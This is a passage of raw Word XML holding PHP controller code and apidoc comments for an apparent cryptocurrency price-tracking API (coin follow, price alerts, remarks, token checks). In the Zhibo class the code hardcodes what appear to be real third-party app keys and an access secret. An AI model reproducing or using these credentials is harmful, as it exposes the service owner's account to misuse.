          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D24C4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692F0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未找到虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2D29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A616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2FB0FE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2BDE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161B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/api/coinfollow/unfollow </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员取消关注虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751F43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会员取消关注虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7ED7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5C12F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5EBE19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3DE95F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coin_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D090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取消关注成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDE0A1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@apiError {String} err       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4736CC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61A5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unfollow()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691139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4C75D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$coin_id = input('param.coin_id') ? input('param.coin_id') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5707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($coin_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C932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 = _user($this-&gt;memberId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699576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 = Db::name('member_coin')-&gt;where('member_id', $member['id'])-&gt;where('coin_id', $coin_id)-&gt;delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EC39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($ret) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7270E0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Db::name('coin')-&gt;where('id', $coin_id)-&gt;setDec('follow_num', 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6944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7CF1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['ret' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>取消关注成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385BB5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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315A32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['err' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>缺少参数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5E4D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8D8EC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34E3B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E8B3C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958B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/api/coinfollow/recommend </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推荐会员关注虚拟币列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1392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推荐会员关注虚拟币列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD787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2674D2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6AC1EB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2C7F9B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{Object} data             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推荐列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366FB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data.id          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D166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data.currency    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5328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data.fullname    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币全称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5806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 @apiSuccess {String} data.fullname_zh </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币中文全称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0A4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data.follow_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4B1B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5DC5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recommend()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007125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FA7CB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$push = Db::name('coin')-&gt;order('follow_num asc')-&gt;limit(10)-&gt;field('id,currency,fullname,fullname_zh,follow_num')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3332FA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if($push){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B441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foreach($push as &amp;$p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F403B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338D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$p['icon'] = '/public/coin/icon/' . strtolower($p['currency']) . '@2x.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB5F8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0247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json($push);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C889F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6AD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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前没有可推荐的虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EED35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D1A8D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B5E8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/api/coinfollow/alert </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>设置价格提醒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639964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设置价格提醒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB49E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4234E7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029CB2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508532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exchange           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FE9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symbol             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61125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alert1             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>高价提醒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174E6C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{Number} alert2             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>低价提醒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AF63C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ret              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0194D6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5F26E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alert()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008C0E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08D6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validate('Coinfollow');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261113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783617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4E32FB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DA68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$alert['member_id']=$this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ECB1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$alert['exchange']=input('post.exchange', 'binance','org\Filter::safeHtml');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285B5F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$alert['symbol']=input('post.symbol');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546D3F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$alert['handle']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2F89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$alert['member_id']=$this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AFC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$price1=input('post.alert1');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AC39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$price2=input('post.alert2');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5413DF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$set_alert=function ($alert){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196DC0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db('symbol_alert')-&gt;insert($alert);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2276C3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2C7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if($price1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62750E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AB99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$alert['price']=$price1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3524D0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$ret=$set_alert($alert); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606DFA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230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if($price2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D59B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BEB8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$alert['price']=$price2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C8A0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$ret=$set_alert($alert); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BAAC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6A0E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 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>设置成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C12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9CD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A738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        {post} /api/coinfollow/remarks </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>备注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1D58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@apiName    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>备注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CEBA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@apiGroup   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>行情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDB96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@apiVersion 0.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1CF9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token              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259652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base               </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F728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@apiParam {String} content            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>备注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDF8C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{Object} data             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不传</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段，如果用户设置了备注，返回备注，没设置备注返回</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>err</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；传</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段，会新建和更新备注，返回用户最新备注；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511CD6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data.id              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>备注</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A20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{Number} data.member_id       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346C37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data.base            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3698BF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 @apiSuccess {String} data.content         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>备注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D08A0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F0027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remarks()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E819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1A0D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validate('Remarks');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4476F0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if(!$validate-&gt;check(input('post.'))){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F25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 =&gt; $validate-&gt;getError()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681956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F1156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$where['member_id']=$this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474021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$where['base']=input('post.base');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0257EA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$content=input('post.content');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC1E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$remarks=Db::name('remarks')-&gt;where($where)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74947C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if($content){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F744A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if($remarks){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B585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$remarks['content']=$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE12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Db::name('remarks')-&gt;where($where)-&gt;update($remarks);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9F8E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62F54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$remarks=$where;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C51F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$remarks['content']=$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355BFA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Db::name('remarks')-&gt;insert($remarks);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249E0B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E19E8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json(Db::name('remarks')-&gt;where($where)-&gt;find());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E92D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687E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if($remarks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06648D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json($remarks);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA14A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8C6B1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未找到备注</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F14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0D8D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03E7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0DD90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3EF9A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app\api\controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDBDF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app\api\controller\Common;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0765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use think\Db;       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC84A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use think\Session;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D151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062F55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Zhibo extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E8C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E1FC5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$member         =   null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E29C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$url            =   'https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A485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$AppId          =   '2614';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA2AD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$appBiaozhi     =   'd1329b71ac2e4bf2b50e63b8b07eaa4b';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E91E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$accessSecret   =   'f5e4337125134d628a8868954d268e0c';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E53DA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$AppKey         =   'f43d25394e37458ab3694d4f90a78d47';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EFD5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__construct($tokenaaa=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EFAE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parent::__construct();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFCF1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$config=Db::name('member_config')-&gt;where('name','switch')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD4E51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unset($data);   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316596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if(!$config || $config==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2140CD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exit(json_encode(['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E20CA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B04CB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$token=Session::get('user','ffxiangUser') ? Session::get('user','ffxiangUser') : input('post.token');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F3E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6649B6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if($tokenaaa){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E7D8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$token=$tokenaaa;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6E3C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9262E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json_encode(['err'=&gt;'token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C9D2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51A406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CA872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3F67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$uid=_decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6E04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53AE89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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确，请重新获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>token']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CC6B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623955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865E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$member=_user($uid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F42B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073958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($member['hide']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFEA73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'0':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D61F0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账户被禁止</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6149B5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63C837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无法登录，原因是账户已被封号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1305F4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84AB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0ABDEA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32E28C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82F4E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09D173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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账户正在审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435B2D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1BE63A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账户正在审核，请等待客服处理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A666F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6E244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616AC0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76080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2C2B9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case '3':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE87C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$recording=_records($member['id'],'API</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作，账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
